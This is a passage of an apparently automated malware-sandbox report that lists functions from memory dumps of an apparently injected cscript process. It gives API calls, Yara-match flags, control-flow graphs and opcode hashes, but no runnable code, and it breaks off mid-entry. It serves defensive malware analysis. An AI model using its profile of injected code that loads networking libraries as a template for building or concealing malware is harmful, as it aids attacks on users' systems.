                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtClose.NTDLL(03014D50,?,?,03014D50,00000000,FFFFFFFF), ref: 0301A4B5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                                                                        • Opcode ID: e327d813ded35b59d8ca00ef1b63904e5c9d6c1ed257d589112194f8ea339bdf
                                                                                                                                                                                                        • Instruction ID: 79ccbb89a8adf19add4f3271325a2c2f18d9d8fa43911f744c90dd6876f7ef17
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e327d813ded35b59d8ca00ef1b63904e5c9d6c1ed257d589112194f8ea339bdf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3E0263A3012046FC710DFE4DC44EE737A8EF84310F144159F91D8B241C130E1118B90
                                                                                                                                                                                                        Function 0301A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtClose.NTDLL(03014D50,?,?,03014D50,00000000,FFFFFFFF), ref: 0301A4B5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                                        • Instruction ID: abb5067ec43e2e5d31a8daf0e5d201ec7007d050ea08802843e0b5720e19cfe2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72D012752013146BD710EBD8CC45ED7776CEF44660F154459BA1C5B241C530F51086E0
                                                                                                                                                                                                        Function 051F34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: f78821e62e52c5e0d5033c6064b8c9460a2b1acd9bec90dd186c13a0439dafd1
                                                                                                                                                                                                        • Instruction ID: a446bbf77ec78dc9828ec7ef83c6e5bdc11368a54ca286a28c246a209564104c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f78821e62e52c5e0d5033c6064b8c9460a2b1acd9bec90dd186c13a0439dafd1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC90023161650802D6006158465470710568BD0301FA1D815A041456CEC7E5895175A2
                                                                                                                                                                                                        Function 051F2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 64c0c96ebe973473632bc105d2ab80164c082938a34dd4aa631cfe3a854354c0
                                                                                                                                                                                                        • Instruction ID: 5956181b040bb4af61ac9cdc1677c9e9c85a920ccbfbb4b826b5be238138afd9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 64c0c96ebe973473632bc105d2ab80164c082938a34dd4aa631cfe3a854354c0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7490023121240813D61161584644707005A8BD0341FD1D816A041455CED6A68952B121
                                                                                                                                                                                                        Function 051F2DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: af9b0b75b7eb0252ff74cf66013ea97d11a70f30a499821760a46969d5f4b868
                                                                                                                                                                                                        • Instruction ID: 6e4ade05d59d07eb06b76a1a4bb7e63efddd38bc6ff47e0a499418639e062471
                                                                                                                                                                                                        • Opcode Fuzzy Hash: af9b0b75b7eb0252ff74cf66013ea97d11a70f30a499821760a46969d5f4b868
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B590027121240802D6407158454474700568BD0301F91D415A5054558FC6A98DD57665
                                                                                                                                                                                                        Function 051F2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 4e5f4e488c7a1a9ebe23a1c17127a943fc71c15ebff3d502bf6cde29ec404e93
                                                                                                                                                                                                        • Instruction ID: 0426e7214dc20d2c6cd23ffcfa5c066fdf79dcc8e4a6bd7827ff27b909baa970
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e5f4e488c7a1a9ebe23a1c17127a943fc71c15ebff3d502bf6cde29ec404e93
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F90022922340402D6807158554860B00568BD1302FD1E819A000555CDC96588696321
                                                                                                                                                                                                        Function 051F2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 959aec5db87ea0d5bbfcbb123449fee6560bc5adf49f885ebd0f4c05636a6244
                                                                                                                                                                                                        • Instruction ID: d5c83deb6242c55b5d0096eb41dd16585129ad8dac04ee384b2f1bacc75611d3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 959aec5db87ea0d5bbfcbb123449fee6560bc5adf49f885ebd0f4c05636a6244
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88900221253445525A45B158454450740579BE0341BD1D416A1404954DC5769856E621
                                                                                                                                                                                                        Function 051F2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 51175cbe9efd9a2390c8cc2ba80c19593b006dc85700ef3946ae829eae261cb8
                                                                                                                                                                                                        • Instruction ID: 479aa358e56a38a3d4994c8a563eb14d7f0428cb5642d608e34fa57023a1002e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51175cbe9efd9a2390c8cc2ba80c19593b006dc85700ef3946ae829eae261cb8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0900221222C0442D70065684D54B0700568BD0303F91D519A0144558DC96588616521
                                                                                                                                                                                                        Function 051F2E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: e40fc886471b9f3519bee2f0e57011a705309ee4e7a7e4599b201aebd320095b
                                                                                                                                                                                                        • Instruction ID: c35134040c530769295df22de872f2f9e9b74d10115499e537e1df94586903ba
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e40fc886471b9f3519bee2f0e57011a705309ee4e7a7e4599b201aebd320095b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C190026135240842D60061584554B070056CBE1301F91D419E1054558EC669CC527126
                                                                                                                                                                                                        Function 051F29F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 5e3fafa9feb1e7dedd7421338962de7dffbabcb7d4af9b82b879c06128e420b2
                                                                                                                                                                                                        • Instruction ID: 4106ce261fbc887bf13ac10040aa52a4df7e416e17ab5011678e073856fe478c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e3fafa9feb1e7dedd7421338962de7dffbabcb7d4af9b82b879c06128e420b2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72900225222404030605A558074450700978BD5351791D425F1005554DD67188616121
                                                                                                                                                                                                        Function 051F2B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 1c29c2fb79d619c068c8bb0efad416fe1f24422a462eec112e9104aae60b4c42
                                                                                                                                                                                                        • Instruction ID: 890fbca28489361c1821d4df0a9834c3cb91bc7b096e884429bf7b5545cfa493
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c29c2fb79d619c068c8bb0efad416fe1f24422a462eec112e9104aae60b4c42
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED90023121240C02D6807158454464B00568BD1301FD1D419A0015658ECA658A5977A1
                                                                                                                                                                                                        Function 051F2B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: d4d130620a9271a3773482d5693e1cc6343ea50296ee738ab74fcf34f1686547
                                                                                                                                                                                                        • Instruction ID: 7e14407376b051c80480a59c85c01f809c7c9ad62aa244b31535da5b3e8a6156
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4d130620a9271a3773482d5693e1cc6343ea50296ee738ab74fcf34f1686547
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A390023121644C42D64071584544A4700668BD0305F91D415A0054698ED6758D55B661
                                                                                                                                                                                                        Function 051F2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 611b30ba83f6473ba61b6ca4cc3cecfcf08985beaf578ab744a4573a1ce1d987
                                                                                                                                                                                                        • Instruction ID: 9b034a9229d9dd2fafa7821a349f366ea2baca817c83869bb6c303d6b4bf15ea
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 611b30ba83f6473ba61b6ca4cc3cecfcf08985beaf578ab744a4573a1ce1d987
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E390023121248C02D6106158854474B00568BD0301F95D815A441465CEC6E588917121
                                                                                                                                                                                                        Function 051F2B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: ba57bf811ced8293adb7a79a1ccb37b9ce2dcaa3a32f60af733e3790610142b3
                                                                                                                                                                                                        • Instruction ID: 4ea3a94659b8187a61f688321b2830dd7ce90c90b0f0bd32a9ce5ffd2ac2c790
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba57bf811ced8293adb7a79a1ccb37b9ce2dcaa3a32f60af733e3790610142b3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6590023121240C42D60061584544B4700568BE0301F91D41AA0114658EC665C8517521
                                                                                                                                                                                                        Function 051F2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: df992cfadc584349908673f902747b7d8661e3d6e20d8fec9d23dd2fca7045ce
                                                                                                                                                                                                        • Instruction ID: 77a453334cf7b15a2a801828cb78a5b103e850c0f6774596466c3bb1c118fa84
                                                                                                                                                                                                        • Opcode Fuzzy Hash: df992cfadc584349908673f902747b7d8661e3d6e20d8fec9d23dd2fca7045ce
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C890023121240802D6006598554864700568BE0301F91E415A5014559FC6B588917131
                                                                                                                                                                                                        Function 051F2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 186d2f74a69ae1b35147a7680f19e298f00e7147c6af35576018a264186e93c1
                                                                                                                                                                                                        • Instruction ID: 4e61ffbfd19ed603e57a46319ed8f5a7c19e4bb752943d0a1545f985fa08bf30
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 186d2f74a69ae1b35147a7680f19e298f00e7147c6af35576018a264186e93c1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9090026121340403460571584554617405B8BE0301F91D425E1004594EC57588917125
                                                                                                                                                                                                        Function 03008308 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59threadwindowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0300836A
                                                                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0300838B
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                        • API String ID: 1836367815-3372436214
                                                                                                                                                                                                        • Opcode ID: 6ef3ffc0fe32632290c27dc054df152625fc3ea72ac42161163004552e97edf1
                                                                                                                                                                                                        • Instruction ID: ee57164018c7c0e0b1d91fdc59c153dc0e8db3b4cbcd5c2e8eafa8977cee08e1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ef3ffc0fe32632290c27dc054df152625fc3ea72ac42161163004552e97edf1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3501D835A813287BF721EA949C02FFF7B6C5B80B55F044154FF08BE1C1EAA5690547E6
                                                                                                                                                                                                        Function 03019076 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 258 3019076-3019077 259 30190a4 258->259 260 3019079-30190a1 258->260 262 30190a6-30190ad 259->262 263 301910f-3019112 259->263 260->259 266 30190dd-301910d call 300acf0 call 3014e50 262->266 267 30190af-30190c2 call 301bd40 262->267 264 3019113-3019118 263->264 265 30190cf-30190db 263->265 268 3019120-3019131 Sleep 264->268 265->266 266->263 278 30190c8-30190ce call 301be10 267->278 279 301919c-30191a2 267->279 272 3019133-3019139 268->272 273 3019196-301919a 268->273 276 3019163-3019183 272->276 277 301913b-3019161 call 3018ca0 272->277 273->268 273->279 281 3019189-301918c 276->281 282 3019184 call 3018eb0 276->282 277->281 278->265 281->273 282->281
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 03019128
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                                                                                                        • Opcode ID: 9a87fc1e69d1cef6883ca529739254e621e3a28c5e340b6eefd2a98a85eec123
                                                                                                                                                                                                        • Instruction ID: 8777edbe8b1ffe68e7dc07861c7e7b0e61ddccb26ff770579314af2a6886619b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a87fc1e69d1cef6883ca529739254e621e3a28c5e340b6eefd2a98a85eec123
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E63146B6902304ABC714DF68C885FABB7F8EB88B00F148059E61D5B240D734A661CBE5
                                                                                                                                                                                                        Function 03019080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 286 3019080-30190a4 288 30190a6-30190ad 286->288 289 301910f-3019112 286->289 292 30190dd-30190ec call 300acf0 288->292 293 30190af-30190b6 call 301bd40 288->293 290 3019113-3019118 289->290 291 30190cf-30190db 289->291 294 3019120-3019131 Sleep 290->294 291->292 297 30190f1-301910d call 3014e50 292->297 300 30190bb-30190c2 293->300 298 3019133-3019139 294->298 299 3019196-301919a 294->299 297->289 302 3019163-3019183 298->302 303 301913b-3019161 call 3018ca0 298->303 299->294 305 301919c-30191a2 299->305 304 30190c8-30190ce call 301be10 300->304 300->305 307 3019189-301918c 302->307 308 3019184 call 3018eb0 302->308 303->307 304->291 307->299 308->307
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 03019128
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                                                                                                        • Opcode ID: b9bcff13a90b1ba5da00e8373b1a167007188958bc0109db7198ece4eb4567d8
                                                                                                                                                                                                        • Instruction ID: 60197a70edaee46c252d506a6227cff46da0fe1883fe448da718a09ffe91bf35
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9bcff13a90b1ba5da00e8373b1a167007188958bc0109db7198ece4eb4567d8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 963181B6501344ABC724DF68C885FABB7F9AB88B00F14851DF62A5B245D730B660CBA4
                                                                                                                                                                                                        Function 0301A6AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
